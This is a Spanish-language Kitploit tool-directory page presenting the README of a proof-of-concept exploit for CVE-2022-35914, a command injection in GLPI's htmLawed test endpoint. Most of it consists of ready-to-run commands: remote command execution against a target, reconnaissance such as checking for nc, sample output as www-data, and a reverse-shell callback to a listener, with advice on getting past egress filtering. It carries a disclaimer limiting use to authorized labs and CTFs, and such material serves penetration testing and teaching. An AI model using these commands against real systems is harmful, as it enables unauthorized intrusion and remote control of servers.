Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-35914-RCE — PoC exploit para CVE-2022-35914 — inyección de comandos en htmLawed de GLPI v.10.0.2, ejecución de comandos y soporte de reverse shell. | Kitploit
Herramientas/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

PoC exploit para CVE-2022-35914 — inyección de comandos en htmLawed de GLPI v.10.0.2, ejecución de comandos y soporte de reverse shell.

Ver Repositorio
hace 9 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-35914 by cyb3rk0ala

PoC para CVE-2022-35914, una vulnerabilidad de inyección de comandos que afecta al componente de prueba htmLawed en instalaciones vulnerables de GLPI.

La herramienta permite la ejecución de comandos a través del endpoint vulnerable e incluye funcionalidad opcional de callback para entornos de laboratorio autorizados.

Aviso legal: Este proyecto está destinado únicamente a pruebas de seguridad autorizadas, CTFs, laboratorios de OffSec/PG y fines educativos. No lo utilices contra sistemas sin autorización explícita.


Vulnerabilidad

CampoDetalles
CVECVE-2022-35914
SoftwareGLPI
ComponentehtmLawed
Endpoint vulnerable/vendor/htmlawed/htmlawed/htmLawedTest.php

El componente vulnerable puede permitir la ejecución de comandos mediante parámetros manipulados en las instalaciones afectadas.


Características

  • Ejecución de comandos
  • Construcción automática de la URL del objetivo
  • Puerto HTTP del objetivo configurable
  • Obtención automática de sesión/token
  • Extracción de la salida de comandos
  • Comprobación del objetivo
  • Soporte de User-Agent personalizado
  • Configuración opcional de callback
  • Salida de terminal con colores
  • Interfaz CLI en Python 3

Requisitos

Python 3 y las dependencias necesarias.

Kali Linux

root@kitploit:~
sudo apt install python3-requests python3-bs4

Entorno virtual

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Instalación

Clona el repositorio:

root@kitploit:~
git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

Haz el script ejecutable:

root@kitploit:~
chmod +x glpi.py

Uso

Ayuda

root@kitploit:~
python3 glpi.py -h

Ejecución básica de comandos

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

Ejemplo de salida:

root@kitploit:~
[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

Ejecución de comandos

La opción -c especifica el comando a ejecutar.

Usuario actual

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'whoami'

Privilegios actuales

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

Sistema operativo

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'uname -a'

Utilidades disponibles

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Opciones


Puerto del objetivo

La opción -p / --rport especifica el puerto en el que se está ejecutando el servicio web vulnerable de GLPI.

Por defecto:

root@kitploit:~
80

Ejemplo:

root@kitploit:~
python3 glpi.py -u TARGET_IP -p 80 -c 'id'

Comprobación del objetivo

Usa --check para verificar que la página de prueba de htmLawed está disponible sin ejecutar un comando:

root@kitploit:~
python3 glpi.py -u TARGET_IP --check

User-Agent personalizado

Se puede proporcionar un User-Agent HTTP personalizado con:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

Reverse Shell

El script admite parámetros opcionales de callback:

root@kitploit:~
-l   Callback/listener IP
-lp  Callback/listener port

Ejemplo:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

En este ejemplo:

root@kitploit:~
Target:   TARGET_IP:80
Callback: LHOST:80

Los dos puertos tienen propósitos diferentes:

root@kitploit:~
-p   = Target GLPI HTTP port
-lp  = Callback/listener port

Nota sobre el laboratorio de OffSec

Durante las pruebas en un entorno de laboratorio de OffSec, el callback funcionó correctamente a través del puerto TCP 80.

Otros puertos de callback, como 4444, pueden agotar el tiempo de espera (timeout) según la red del laboratorio y el filtrado de salida (egress).

Para el entorno probado:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

El listener se configuró en la interfaz VPN de Kali usando el puerto TCP 80.

Importante: El uso del puerto 80 para el callback es una observación específica del entorno. No es un requisito de CVE-2022-35914.


Solución de problemas

La ejecución de comandos funciona, pero el callback no

Primero verifica la ejecución de comandos:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

Comprueba si existen las utilidades necesarias:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Si la ejecución de comandos funciona pero el callback agota el tiempo de espera, revisa el enrutamiento de la VPN y el puerto del callback.


La salida del comando parece incorrecta

Si el análisis de la salida del comando falla, la respuesta HTTP completa se guarda en:

root@kitploit:~
/tmp/glpi.html

Inspecciónala con:

root@kitploit:~
less /tmp/glpi.html

o:

root@kitploit:~
mousepad /tmp/glpi.html

Flujo de trabajo de ejemplo

1. Comprueba el objetivo

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --check

2. Confirma la ejecución de comandos

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. Identifica al usuario actual

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. Comprueba las herramientas disponibles

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. Configura el callback

Para el entorno de laboratorio de OffSec probado:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

Aviso legal

Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

El autor no es responsable de ningún uso indebido, daño, acceso no autorizado o actividad ilegal que involucre este software.

Siempre obtén autorización explícita antes de probar un sistema.


Autor

cyb3rk0ala


CVE

CVE-2022-35914


Proyecto

CVE-2022-35914 by cyb3rk0ala

Descargar herramienta
OpciónDescripciónPor defecto
-u, --urlURL o dirección IP del objetivoObligatorio
-c, --cmdComando a ejecutarid
--checkComprueba el objetivo sin ejecutar un comandoDeshabilitado
--user-agentUser-Agent HTTP personalizadoPredeterminado
-p, --rportPuerto del servicio HTTP del objetivo80
-l, --lhostDirección IP del callback/listener—
-lp, --lportPuerto del callback/listener—